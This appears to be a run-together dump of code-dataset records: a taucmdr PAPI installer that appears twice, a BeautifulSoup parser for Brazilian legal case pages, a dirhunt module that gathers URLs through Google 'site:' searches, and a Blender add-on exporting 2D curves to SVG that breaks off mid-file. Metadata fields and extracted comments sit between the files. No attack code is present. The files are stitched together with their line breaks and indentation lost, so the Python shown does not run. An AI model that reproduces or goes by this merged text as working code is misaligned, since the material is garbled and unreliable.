HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # """PAPI software installation management. PAPI is used to measure hardware performance counters. """ import os import re import sys import fileinput from HTMLParser import HTMLParser from subprocess import CalledProcessError from xml.etree import ElementTree from taucmdr import logger, util from taucmdr.error import ConfigurationError from taucmdr.cf.software import SoftwarePackageError from taucmdr.cf.software.installation import AutotoolsInstallation from taucmdr.cf.compiler.host import CC, CXX, IBM, GNU LOGGER = logger.get_logger(__name__) REPOS = {None: 'http://icl.utk.edu/projects/papi/downloads/papi-5.5.1.tar.gz'} LIBRARIES = {None: ['libpapi.a']} class PapiInstallation(AutotoolsInstallation): """Encapsulates a PAPI installation.""" def __init__(self, sources, target_arch, target_os, compilers): # PAPI can't be built with IBM compilers so substitute GNU compilers instead if compilers[CC].unwrap().info.family is IBM: try: gnu_compilers = GNU.installation() except ConfigurationError: raise SoftwarePackageError("GNU compilers (required to build PAPI) could not be found.") compilers = compilers.modify(Host_CC=gnu_compilers[CC], Host_CXX=gnu_compilers[CXX]) super(PapiInstallation, self).__init__('papi', 'PAPI', sources, target_arch, target_os, compilers, REPOS, None, LIBRARIES, None) self._xml_event_info = None def _prepare_src(self, *args, **kwargs): # PAPI's source lives in a 'src' directory instead of the usual top level location src_prefix = super(PapiInstallation, self)._prepare_src(*args, **kwargs) if os.path.basename(src_prefix) != 'src': src_prefix = os.path.join(src_prefix, 'src') return src_prefix def configure(self, flags): cc = self.compilers[CC].unwrap().absolute_path cxx = self.compilers[CXX].unwrap().absolute_path os.environ['CC'] = cc os.environ['CXX'] = cxx flags.extend(['CC='+cc, 'CXX='+cxx]) return super(PapiInstallation, self).configure(flags) def make(self, flags): # PAPI's tests often fail to compile, so disable them. for line in fileinput.input(os.path.join(self._src_prefix, 'Makefile'), inplace=1): # fileinput.input with inplace=1 redirects stdout to the input file ... freaky sys.stdout.write(line.replace('TESTS =', '#TESTS =')) super(PapiInstallation, self).make(flags) def xml_event_info(self): if not self._xml_event_info: self.install() xml_event_info = util.get_command_output(os.path.join(self.bin_path, 'papi_xml_event_info')) self._xml_event_info = ElementTree.fromstring(xml_event_info) return self._xml_event_info def parse_metrics(self, metrics): """Extracts PAPI metrics from a list of metrics and strips TAU's metric prefixes.""" return [re.sub('PAPI_NATIVE[:_]', '', metric) for metric in metrics if metric.startswith("PAPI")] def check_metrics(self, metrics): """Checks compatibility of PAPI metrics. Extracts all PAPI metrics from `metrics` and executes papi_event_chooser to check compatibility. Args: metrics (list): List of metrics. Raises: ConfigurationError: PAPI metrics are not compatible on the current host. """ papi_metrics = self.parse_metrics(metrics) if not papi_metrics: return self.install() event_chooser_cmd = os.path.join(self.bin_path, 'papi_event_chooser') cmd = [event_chooser_cmd, 'PRESET'] + papi_metrics try: util.get_command_output(cmd) except CalledProcessError as err: for line in err.output.split('\n'): if "can't be counted with others" in line: parts = line.split() try: event = parts[1] code = int(parts[-1]) except (IndexError, ValueError): continue if code == -1: why = ": %s is not compatible with other events" % event elif code == -8: why = ": %s cannot be counted due to resource limitations" % event else: why = ": %s is not supported on this host" % event break elif "can't be found" in line: parts = line.split() try: event = parts[1] except IndexError: continue why = ": event %s is not available on the current host" % event break else: why = ', and output from papi_event_chooser was not parsable.' raise ConfigurationError(("PAPI metrics [%s] are not compatible on the current host%s.") % (', '.join(papi_metrics), why), "Use papi_avail to check metric availability.", "Spread the desired metrics over multiple measurements.", "Choose fewer metrics.", "You may ignore this if you are cross-compiling.") def papi_metrics(self, event_type="PRESET", include_modifiers=False): """List PAPI available metrics. Returns a list of (name, description) tuples corresponding to the requested PAPI event type and possibly the event modifiers. Args: event_type (str): Either "PRESET" or "NATIVE". include_modifiers (bool): If True include event modifiers, e.g. BR_INST_EXEC:NONTAKEN_COND as well as BR_INST_EXEC. Returns: list: List of event name/description tuples. """ assert event_type == "PRESET" or event_type == "NATIVE" metrics = [] html_parser = HTMLParser() def _format(item): name = item.attrib['name'] desc = html_parser.unescape(item.attrib['desc']) desc = desc[0].capitalize() + desc[1:] + "." return name, desc xml_event_info = self.xml_event_info() for eventset in xml_event_info.iter('eventset'): if eventset.attrib['type'] == event_type: for event in eventset.iter('event'): if include_modifiers: for modifier in event.iter('modifier'): metrics.append(_format(modifier)) metrics.append(_format(event)) return metrics
# -*- coding: utf-8 -*- # # Copyright (c) 2015, ParaTools, Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # (1) Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # (2) Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # (3) Neither the name of ParaTools, Inc. nor the names of its contributors may # be used to endorse or promote products derived from this software without # specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # """PAPI software installation management. PAPI is used to measure hardware performance counters. """ import os import re import sys import fileinput from HTMLParser import HTMLParser from subprocess import CalledProcessError from xml.etree import ElementTree from taucmdr import logger, util from taucmdr.error import ConfigurationError from taucmdr.cf.software import SoftwarePackageError from taucmdr.cf.software.installation import AutotoolsInstallation from taucmdr.cf.compiler.host import CC, CXX, IBM, GNU LOGGER = logger.get_logger(__name__) REPOS = {None: 'http://icl.utk.edu/projects/papi/downloads/papi-5.5.1.tar.gz'} LIBRARIES = {None: ['libpapi.a']} class PapiInstallation(AutotoolsInstallation): """Encapsulates a PAPI installation.""" def __init__(self, sources, target_arch, target_os, compilers): # PAPI can't be built with IBM compilers so substitute GNU compilers instead if compilers[CC].unwrap().info.family is IBM: try: gnu_compilers = GNU.installation() except ConfigurationError: raise SoftwarePackageError("GNU compilers (required to build PAPI) could not be found.") compilers = compilers.modify(Host_CC=gnu_compilers[CC], Host_CXX=gnu_compilers[CXX]) super(PapiInstallation, self).__init__('papi', 'PAPI', sources, target_arch, target_os, compilers, REPOS, None, LIBRARIES, None) self._xml_event_info = None def _prepare_src(self, *args, **kwargs): # PAPI's source lives in a 'src' directory instead of the usual top level location src_prefix = super(PapiInstallation, self)._prepare_src(*args, **kwargs) if os.path.basename(src_prefix) != 'src': src_prefix = os.path.join(src_prefix, 'src') return src_prefix def configure(self, flags): cc = self.compilers[CC].unwrap().absolute_path cxx = self.compilers[CXX].unwrap().absolute_path os.environ['CC'] = cc os.environ['CXX'] = cxx flags.extend(['CC='+cc, 'CXX='+cxx]) return super(PapiInstallation, self).configure(flags) def make(self, flags): # PAPI's tests often fail to compile, so disable them. for line in fileinput.input(os.path.join(self._src_prefix, 'Makefile'), inplace=1): # fileinput.input with inplace=1 redirects stdout to the input file ... freaky sys.stdout.write(line.replace('TESTS =', '#TESTS =')) super(PapiInstallation, self).make(flags) def xml_event_info(self): if not self._xml_event_info: self.install() xml_event_info = util.get_command_output(os.path.join(self.bin_path, 'papi_xml_event_info')) self._xml_event_info = ElementTree.fromstring(xml_event_info) return self._xml_event_info def parse_metrics(self, metrics): """Extracts PAPI metrics from a list of metrics and strips TAU's metric prefixes.""" return [re.sub('PAPI_NATIVE[:_]', '', metric) for metric in metrics if metric.startswith("PAPI")] def check_metrics(self, metrics): """Checks compatibility of PAPI metrics. Extracts all PAPI metrics from `metrics` and executes papi_event_chooser to check compatibility. Args: metrics (list): List of metrics. Raises: ConfigurationError: PAPI metrics are not compatible on the current host. """ papi_metrics = self.parse_metrics(metrics) if not papi_metrics: return self.install() event_chooser_cmd = os.path.join(self.bin_path, 'papi_event_chooser') cmd = [event_chooser_cmd, 'PRESET'] + papi_metrics try: util.get_command_output(cmd) except CalledProcessError as err: for line in err.output.split('\n'): if "can't be counted with others" in line: parts = line.split() try: event = parts[1] code = int(parts[-1]) except (IndexError, ValueError): continue if code == -1: why = ": %s is not compatible with other events" % event elif code == -8: why = ": %s cannot be counted due to resource limitations" % event else: why = ": %s is not supported on this host" % event break elif "can't be found" in line: parts = line.split() try: event = parts[1] except IndexError: continue why = ": event %s is not available on the current host" % event break else: why = ', and output from papi_event_chooser was not parsable.' raise ConfigurationError(("PAPI metrics [%s] are not compatible on the current host%s.") % (', '.join(papi_metrics), why), "Use papi_avail to check metric availability.", "Spread the desired metrics over multiple measurements.", "Choose fewer metrics.", "You may ignore this if you are cross-compiling.") def papi_metrics(self, event_type="PRESET", include_modifiers=False): """List PAPI available metrics. Returns a list of (name, description) tuples corresponding to the requested PAPI event type and possibly the event modifiers. Args: event_type (str): Either "PRESET" or "NATIVE". include_modifiers (bool): If True include event modifiers, e.g. BR_INST_EXEC:NONTAKEN_COND as well as BR_INST_EXEC. Returns: list: List of event name/description tuples. """ assert event_type == "PRESET" or event_type == "NATIVE" metrics = [] html_parser = HTMLParser() def _format(item): name = item.attrib['name'] desc = html_parser.unescape(item.attrib['desc']) desc = desc[0].capitalize() + desc[1:] + "." return name, desc xml_event_info = self.xml_event_info() for eventset in xml_event_info.iter('eventset'): if eventset.attrib['type'] == event_type: for event in eventset.iter('event'): if include_modifiers: for modifier in event.iter('modifier'): metrics.append(_format(modifier)) metrics.append(_format(event)) return metrics
en
0.743592
# -*- coding: utf-8 -*- # # Copyright (c) 2015, ParaTools, Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # (1) Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # (2) Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # (3) Neither the name of ParaTools, Inc. nor the names of its contributors may # be used to endorse or promote products derived from this software without # specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # PAPI software installation management. PAPI is used to measure hardware performance counters. Encapsulates a PAPI installation. # PAPI can't be built with IBM compilers so substitute GNU compilers instead # PAPI's source lives in a 'src' directory instead of the usual top level location # PAPI's tests often fail to compile, so disable them. # fileinput.input with inplace=1 redirects stdout to the input file ... freaky Extracts PAPI metrics from a list of metrics and strips TAU's metric prefixes. Checks compatibility of PAPI metrics. Extracts all PAPI metrics from `metrics` and executes papi_event_chooser to check compatibility. Args: metrics (list): List of metrics. Raises: ConfigurationError: PAPI metrics are not compatible on the current host. List PAPI available metrics. Returns a list of (name, description) tuples corresponding to the requested PAPI event type and possibly the event modifiers. Args: event_type (str): Either "PRESET" or "NATIVE". include_modifiers (bool): If True include event modifiers, e.g. BR_INST_EXEC:NONTAKEN_COND as well as BR_INST_EXEC. Returns: list: List of event name/description tuples.
1.033652
1
app/analyzer.py
luizhenriquelongo/legal-process-analyzer
1
6629045
def analyze_case(soup): label_processo = soup.find("label", text="Processo:") label_classe = soup.find("label", text="Classe:") label_valor_da_causa = soup.find("label", text="Valor da ação:") label_juiz = soup.find("label", text="Juiz:") partes_do_processo = soup.find(id="tablePartesPrincipais") ultima_movimentacao = soup.find(id="tabelaUltimasMovimentacoes") numero_do_processo = label_processo.find_next('span').get_text().strip() classe = label_classe.find_next('span').get_text().strip() valor_da_causa = label_valor_da_causa.find_next('span').get_text().strip() juiz = label_juiz.find_next('span').get_text().strip() partes_do_processo = partes_do_processo.find_all('tr') ultima_movimentacao = ultima_movimentacao.find_next('span').get_text().strip() partes = [] for parte in partes_do_processo: parte = ' '.join(parte.get_text().split()) partes.append(parte) response = { "numeroDoProcesso": numero_do_processo, "valorDaCausa": valor_da_causa, "classe": classe, "juiz": juiz, "partesDoProcesso": partes, "ultimaMovimentacao": ultima_movimentacao, } return response
def analyze_case(soup): label_processo = soup.find("label", text="Processo:") label_classe = soup.find("label", text="Classe:") label_valor_da_causa = soup.find("label", text="Valor da ação:") label_juiz = soup.find("label", text="Juiz:") partes_do_processo = soup.find(id="tablePartesPrincipais") ultima_movimentacao = soup.find(id="tabelaUltimasMovimentacoes") numero_do_processo = label_processo.find_next('span').get_text().strip() classe = label_classe.find_next('span').get_text().strip() valor_da_causa = label_valor_da_causa.find_next('span').get_text().strip() juiz = label_juiz.find_next('span').get_text().strip() partes_do_processo = partes_do_processo.find_all('tr') ultima_movimentacao = ultima_movimentacao.find_next('span').get_text().strip() partes = [] for parte in partes_do_processo: parte = ' '.join(parte.get_text().split()) partes.append(parte) response = { "numeroDoProcesso": numero_do_processo, "valorDaCausa": valor_da_causa, "classe": classe, "juiz": juiz, "partesDoProcesso": partes, "ultimaMovimentacao": ultima_movimentacao, } return response
none
1
2.944269
3
dirhunt/sources/google.py
cqr-cryeye-forks/dirhunt
0
6629046
<filename>dirhunt/sources/google.py from dirhunt.sources.base import Source from dirhunt._compat import URLError from googlesearch import search class Google(Source): def callback(self, domain): results = search('site:{}'.format(domain), stop=20) while True: try: url = next(results) except (IOError, URLError) as e: self.add_error('Error on Google Source: {}'.format(e)) break except StopIteration: break else: self.add_result(url)
<filename>dirhunt/sources/google.py from dirhunt.sources.base import Source from dirhunt._compat import URLError from googlesearch import search class Google(Source): def callback(self, domain): results = search('site:{}'.format(domain), stop=20) while True: try: url = next(results) except (IOError, URLError) as e: self.add_error('Error on Google Source: {}'.format(e)) break except StopIteration: break else: self.add_result(url)
none
1
2.785759
3
curve_to_svg.py
crantisz/blender-curve-to-svg
0
6629047
<reponame>crantisz/blender-curve-to-svg bl_info = { 'name': "Export 2D Curve to SVG", 'author': "<NAME>", 'version': (0, 0, 2), 'blender': (2, 80, 0), 'location': "Properties > Data > Export SVG", 'description': "Generate a SVG file from selected 2D Curves", 'warning': "Curve splines may be inverted, so self intersections can be wrong after export", 'wiki_url': "https://github.com/aryelgois/blender-curve-to-svg", 'tracker_url': "https://github.com/aryelgois/blender-curve-to-svg/issues", 'category': "Import-Export"} import bpy from xml.etree import ElementTree from xml.dom import minidom from mathutils import Vector from math import pi VERSION = '.'.join(str(v) for v in (bl_info['version'])) def svg_transform(obj, precision): """Returns SVG transform for object""" loc = obj.location.to_2d().to_tuple(precision) scl = obj.scale.to_2d().to_tuple(precision) rot = round(obj.rotation_euler.z * 180 / pi, precision) result = [] if rot: result.append("rotate({} {} {})".format(rot, *loc)) if loc[0] or loc[1]: result.append("translate({} {})".format(*loc)) if scl[0] != 1.0 or scl[1] != 1.0: result.append("scale({} {})".format(*scl)) return ' '.join(result) def to_hex(ch): """Converts linear channel to sRGB and then to hexadecimal""" # Author: @brecht # Link: https://devtalk.blender.org/t/get-hex-gamma-corrected-color/2422/2 if ch < 0.0031308: srgb = 0.0 if ch < 0.0 else ch * 12.92 else: srgb = ch ** (1.0 / 2.4) * 1.055 - 0.055 return format(max(min(int(srgb * 255 + 0.5), 255), 0), '02x') def col_to_hex(col): """Converts a Color object to hexadecimal""" return '#' + ''.join(to_hex(ch) for ch in col) def pretty_xml(elem): """Returns a pretty-printed XML string for the Element""" rough_string = ElementTree.tostring(elem, 'unicode') reparsed = minidom.parseString(rough_string) return reparsed.toprettyxml(indent=' ') class CurveExportSVGPanel(bpy.types.Panel): """Creates a Panel in the data context of the properties editor""" bl_label = "Export SVG" bl_idname = 'DATA_PT_exportsvg' bl_space_type = 'PROPERTIES' bl_region_type = 'WINDOW' bl_context = 'data' def draw(self, context): """Draws the Export SVG Panel""" scene = context.scene layout = self.layout selected_2d_curve = False selected_other = False for obj in context.selected_objects: if obj.type == 'CURVE' and obj.data.dimensions == '2D': selected_2d_curve = True else: selected_other = True if selected_2d_curve: row = layout.row() row.prop(scene, 'export_svg_output', text="") row = layout.row() row.prop(scene, 'export_svg_minify') row = layout.row() row.prop(scene, 'export_svg_scale') row = layout.row() row.prop(scene, 'export_svg_precision') row = layout.row() row.operator('curve.export_svg', text="Export") if selected_other: layout.label(icon='ERROR', text="Notice: only selected 2D Curves will be exported") else: layout.label(icon='ERROR', text="You must select a 2D Curve") layout.label(text="Go to Shape panel and select 2D") @classmethod def poll(cls, context): """Checks if the Export SVG Panel should appear""" return context.object.type == 'CURVE' class DATA_OT_CurveExportSVG(bpy.types.Operator): """Generates a SVG file from selected 2D Curves""" bl_label = "Export SVG" bl_idname = 'curve.export_svg' # guide https://css-tricks.com/svg-path-syntax-illustrated-guide/ # will be used: M L C S Z commands = { 'moveto': "M {x},{y}", 'lineto': "L {x},{y}", #'lineto_h': "H {x}", #'lineto_v': "V {y}", 'curveto': "C {h1x},{h1y} {h2x},{h2y} {x},{y}", # h = handle_point 'curveto_s': "S {h2x},{h2y} {x},{y}", # mirror handle from previous C or S #'curveto_q': "Q {hx},{hy} {x},{y}", # both handles in same position #'curveto_qs': "T {x},{y}", # mirror handle from previous Q or T #'arc': "A {rx},{ry} {rot} {arc} {sweep} {x},{y}", # arc, sweep -> 0 or 1. it's to choose between four possibilities of arc 'closepath': "Z"} #handle_type = {'AUTO', 'ALIGNED', 'VECTOR', 'FREE'} def execute(self, context): """Exports selected 2D Curves to SVG file""" scene = context.scene precision = scene.export_svg_precision scale = scene.export_svg_scale svg = ElementTree.Element('svg') svg.set('xmlns', "http://www.w3.org/2000/svg") svg.set('version', "1.1") svg.append(ElementTree.Comment(" Generated by blender-curve-to-svg v{} ".format(VERSION))) container = ElementTree.SubElement(svg, 'g') container.set('transform', "scale({0} -{0})".format(scale)) # the Y axis is inverted box = [0, 0, 0, 0] for obj in context.selected_objects: if obj.type != 'CURVE' or obj.data.dimensions != '2D': continue container.append(self.curve_to_svg(obj, precision)) self.update_viewbox(box, obj, precision) box = [round(x * scale, precision) for x in box] svg.set('viewBox', ' '.join(str(x) for x in (box[0], -box[3], box[2] - box[0], box[3] - box[1]))) if scene.export_svg_minify: result = "<?xml version=\"1.0\" ?>" + ElementTree.tostring(svg, 'unicode') else: result = pretty_xml(svg) f = open(scene.export_svg_output, 'w') # TODO: search if is there a better approach f.write(result) f.close() return {'FINISHED'} def curve_to_svg(self, obj, precision): """Converts a Curve object to SVG elements""" materials = obj.data.materials paths = {} for spline in obj.data.splines: id = spline.material_index d = self.spline_to_path(spline, precision) if id in paths: paths[id].extend(d) else: paths[id] = d if materials: container = ElementTree.Element('g') container.set('id', obj.name) transform = svg_transform(obj, precision) if transform: container.set('transform', transform) for id, d in paths.items(): path = ElementTree.SubElement(container, 'path') material = materials[id] if material: path.set('id', material.name) path.set('style', "fill: {}".format(col_to_hex(material.diffuse_color))) path.set('d', ' '.join(d)) return container path = ElementTree.Element('path') path.set('id', obj.name) transform = svg_transform(obj, precision) if transform: path.set('transform', transform) path.set('d', ' '.join(paths[0])) return path def spline_to_path(self, spline, precision): """Converts a Curve Spline to 'd' attribute for path element""" d = [] prev = None # TODO: fix when points are in inverted order # problem: some paths do union instead of difference for point in spline.bezier_points: prev = self.add_command(d, point, prev, precision) if spline.use_cyclic_u: self.add_command(d, spline.bezier_points[0], prev, precision) d.append(self.commands['closepath']) return d def add_command(self, d, point, prev, precision): """Adds the path's next command, returns previous handler point""" p = point.co.to_2d().to_tuple(precision) values = {'x': p[0], 'y': p[1]} # TODO: type will be used to choose between L C S commands # C can do all the job, but using the others can reduce the svg l = (point.handle_left.to_2d().to_tuple(precision), point.handle_left_type) r = (point.handle_right.to_2d().to_tuple(precision), point.handle_right_type) # first command is moveto first point, then curveto others points if not d: command = self.commands['moveto'].format(**values) else: values.update({'h1x': prev[0][0], 'h1y': prev[0][1], 'h2x': l[0][0], 'h2y': l[0][1]}) command = self.commands['curveto'].format(**values) d.append(command) return r def update_viewbox(self, vbox, obj, precision): """Updates viewBox coords to fit an object""" bbox = [(obj.matrix_world @ Vector(corner)).to_tuple(precision) for corner in obj.bound_box] vbox[0] = min([vbox[0], bbox[0][0], bbox[1][0], bbox[2][0], bbox[3][0]]) vbox[1] = min([vbox[1], bbox[0][1], bbox[1][1], bbox[4][1], bbox[5][1]]) vbox[2] = max([vbox[2], bbox[4][0], bbox[5][0], bbox[6][0], bbox[7][0]]) vbox[3] = max([vbox[3], bbox[2][1], bbox[3][1], bbox[6][1], bbox[7][1]]) def register(): """Registers curve_to_svg Add-on""" bpy.types.Scene.export_svg_output = bpy.props.StringProperty( name="Output", description="Path to output file", default="output.svg", subtype='FILE_PATH') bpy.types.Scene.export_svg_minify = bpy.props.BoolProperty( name="Minify", description="SVG in one line", default=False) bpy.types.Scene.export_svg_scale = bpy.props.IntProperty( name="Scale", description="How many pixels one blender unit represents", default=10, min=1) bpy.types.Scene.export_svg_precision = bpy.props.IntProperty( name="Precision", description="Precision of floating point Vectors", default=4, min=0, max=21) bpy.utils.register_class(DATA_OT_CurveExportSVG) bpy.utils.register_class(CurveExportSVGPanel) def unregister(): """Unregisters curve_to_svg Add-on""" bpy.utils.unregister_class(CurveExportSVGPanel) bpy.utils.unregister_class(DATA_OT_CurveExportSVG) del bpy.types.Scene.export_svg_output del bpy.types.Scene.export_svg_minify del bpy.types.Scene.export_svg_scale del bpy.types.Scene.export_svg_precision if __name__ == '__main__': register()
bl_info = { 'name': "Export 2D Curve to SVG", 'author': "<NAME>", 'version': (0, 0, 2), 'blender': (2, 80, 0), 'location': "Properties > Data > Export SVG", 'description': "Generate a SVG file from selected 2D Curves", 'warning': "Curve splines may be inverted, so self intersections can be wrong after export", 'wiki_url': "https://github.com/aryelgois/blender-curve-to-svg", 'tracker_url': "https://github.com/aryelgois/blender-curve-to-svg/issues", 'category': "Import-Export"} import bpy from xml.etree import ElementTree from xml.dom import minidom from mathutils import Vector from math import pi VERSION = '.'.join(str(v) for v in (bl_info['version'])) def svg_transform(obj, precision): """Returns SVG transform for object""" loc = obj.location.to_2d().to_tuple(precision) scl = obj.scale.to_2d().to_tuple(precision) rot = round(obj.rotation_euler.z * 180 / pi, precision) result = [] if rot: result.append("rotate({} {} {})".format(rot, *loc)) if loc[0] or loc[1]: result.append("translate({} {})".format(*loc)) if scl[0] != 1.0 or scl[1] != 1.0: result.append("scale({} {})".format(*scl)) return ' '.join(result) def to_hex(ch): """Converts linear channel to sRGB and then to hexadecimal""" # Author: @brecht # Link: https://devtalk.blender.org/t/get-hex-gamma-corrected-color/2422/2 if ch < 0.0031308: srgb = 0.0 if ch < 0.0 else ch * 12.92 else: srgb = ch ** (1.0 / 2.4) * 1.055 - 0.055 return format(max(min(int(srgb * 255 + 0.5), 255), 0), '02x') def col_to_hex(col): """Converts a Color object to hexadecimal""" return '#' + ''.join(to_hex(ch) for ch in col) def pretty_xml(elem): """Returns a pretty-printed XML string for the Element""" rough_string = ElementTree.tostring(elem, 'unicode') reparsed = minidom.parseString(rough_string) return reparsed.toprettyxml(indent=' ') class CurveExportSVGPanel(bpy.types.Panel): """Creates a Panel in the data context of the properties editor""" bl_label = "Export SVG" bl_idname = 'DATA_PT_exportsvg' bl_space_type = 'PROPERTIES' bl_region_type = 'WINDOW' bl_context = 'data' def draw(self, context): """Draws the Export SVG Panel""" scene = context.scene layout = self.layout selected_2d_curve = False selected_other = False for obj in context.selected_objects: if obj.type == 'CURVE' and obj.data.dimensions == '2D': selected_2d_curve = True else: selected_other = True if selected_2d_curve: row = layout.row() row.prop(scene, 'export_svg_output', text="") row = layout.row() row.prop(scene, 'export_svg_minify') row = layout.row() row.prop(scene, 'export_svg_scale') row = layout.row() row.prop(scene, 'export_svg_precision') row = layout.row() row.operator('curve.export_svg', text="Export") if selected_other: layout.label(icon='ERROR', text="Notice: only selected 2D Curves will be exported") else: layout.label(icon='ERROR', text="You must select a 2D Curve") layout.label(text="Go to Shape panel and select 2D") @classmethod def poll(cls, context): """Checks if the Export SVG Panel should appear""" return context.object.type == 'CURVE' class DATA_OT_CurveExportSVG(bpy.types.Operator): """Generates a SVG file from selected 2D Curves""" bl_label = "Export SVG" bl_idname = 'curve.export_svg' # guide https://css-tricks.com/svg-path-syntax-illustrated-guide/ # will be used: M L C S Z commands = { 'moveto': "M {x},{y}", 'lineto': "L {x},{y}", #'lineto_h': "H {x}", #'lineto_v': "V {y}", 'curveto': "C {h1x},{h1y} {h2x},{h2y} {x},{y}", # h = handle_point 'curveto_s': "S {h2x},{h2y} {x},{y}", # mirror handle from previous C or S #'curveto_q': "Q {hx},{hy} {x},{y}", # both handles in same position #'curveto_qs': "T {x},{y}", # mirror handle from previous Q or T #'arc': "A {rx},{ry} {rot} {arc} {sweep} {x},{y}", # arc, sweep -> 0 or 1. it's to choose between four possibilities of arc 'closepath': "Z"} #handle_type = {'AUTO', 'ALIGNED', 'VECTOR', 'FREE'} def execute(self, context): """Exports selected 2D Curves to SVG file""" scene = context.scene precision = scene.export_svg_precision scale = scene.export_svg_scale svg = ElementTree.Element('svg') svg.set('xmlns', "http://www.w3.org/2000/svg") svg.set('version', "1.1") svg.append(ElementTree.Comment(" Generated by blender-curve-to-svg v{} ".format(VERSION))) container = ElementTree.SubElement(svg, 'g') container.set('transform', "scale({0} -{0})".format(scale)) # the Y axis is inverted box = [0, 0, 0, 0] for obj in context.selected_objects: if obj.type != 'CURVE' or obj.data.dimensions != '2D': continue container.append(self.curve_to_svg(obj, precision)) self.update_viewbox(box, obj, precision) box = [round(x * scale, precision) for x in box] svg.set('viewBox', ' '.join(str(x) for x in (box[0], -box[3], box[2] - box[0], box[3] - box[1]))) if scene.export_svg_minify: result = "<?xml version=\"1.0\" ?>" + ElementTree.tostring(svg, 'unicode') else: result = pretty_xml(svg) f = open(scene.export_svg_output, 'w') # TODO: search if is there a better approach f.write(result) f.close() return {'FINISHED'} def curve_to_svg(self, obj, precision): """Converts a Curve object to SVG elements""" materials = obj.data.materials paths = {} for spline in obj.data.splines: id = spline.material_index d = self.spline_to_path(spline, precision) if id in paths: paths[id].extend(d) else: paths[id] = d if materials: container = ElementTree.Element('g') container.set('id', obj.name) transform = svg_transform(obj, precision) if transform: container.set('transform', transform) for id, d in paths.items(): path = ElementTree.SubElement(container, 'path') material = materials[id] if material: path.set('id', material.name) path.set('style', "fill: {}".format(col_to_hex(material.diffuse_color))) path.set('d', ' '.join(d)) return container path = ElementTree.Element('path') path.set('id', obj.name) transform = svg_transform(obj, precision) if transform: path.set('transform', transform) path.set('d', ' '.join(paths[0])) return path def spline_to_path(self, spline, precision): """Converts a Curve Spline to 'd' attribute for path element""" d = [] prev = None # TODO: fix when points are in inverted order # problem: some paths do union instead of difference for point in spline.bezier_points: prev = self.add_command(d, point, prev, precision) if spline.use_cyclic_u: self.add_command(d, spline.bezier_points[0], prev, precision) d.append(self.commands['closepath']) return d def add_command(self, d, point, prev, precision): """Adds the path's next command, returns previous handler point""" p = point.co.to_2d().to_tuple(precision) values = {'x': p[0], 'y': p[1]} # TODO: type will be used to choose between L C S commands # C can do all the job, but using the others can reduce the svg l = (point.handle_left.to_2d().to_tuple(precision), point.handle_left_type) r = (point.handle_right.to_2d().to_tuple(precision), point.handle_right_type) # first command is moveto first point, then curveto others points if not d: command = self.commands['moveto'].format(**values) else: values.update({'h1x': prev[0][0], 'h1y': prev[0][1], 'h2x': l[0][0], 'h2y': l[0][1]}) command = self.commands['curveto'].format(**values) d.append(command) return r def update_viewbox(self, vbox, obj, precision): """Updates viewBox coords to fit an object""" bbox = [(obj.matrix_world @ Vector(corner)).to_tuple(precision) for corner in obj.bound_box] vbox[0] = min([vbox[0], bbox[0][0], bbox[1][0], bbox[2][0], bbox[3][0]]) vbox[1] = min([vbox[1], bbox[0][1], bbox[1][1], bbox[4][1], bbox[5][1]]) vbox[2] = max([vbox[2], bbox[4][0], bbox[5][0], bbox[6][0], bbox[7][0]]) vbox[3] = max([vbox[3], bbox[2][1], bbox[3][1], bbox[6][1], bbox[7][1]]) def register(): """Registers curve_to_svg Add-on""" bpy.types.Scene.export_svg_output = bpy.props.StringProperty( name="Output", description="Path to output file", default="output.svg", subtype='FILE_PATH') bpy.types.Scene.export_svg_minify = bpy.props.BoolProperty( name="Minify", description="SVG in one line", default=False) 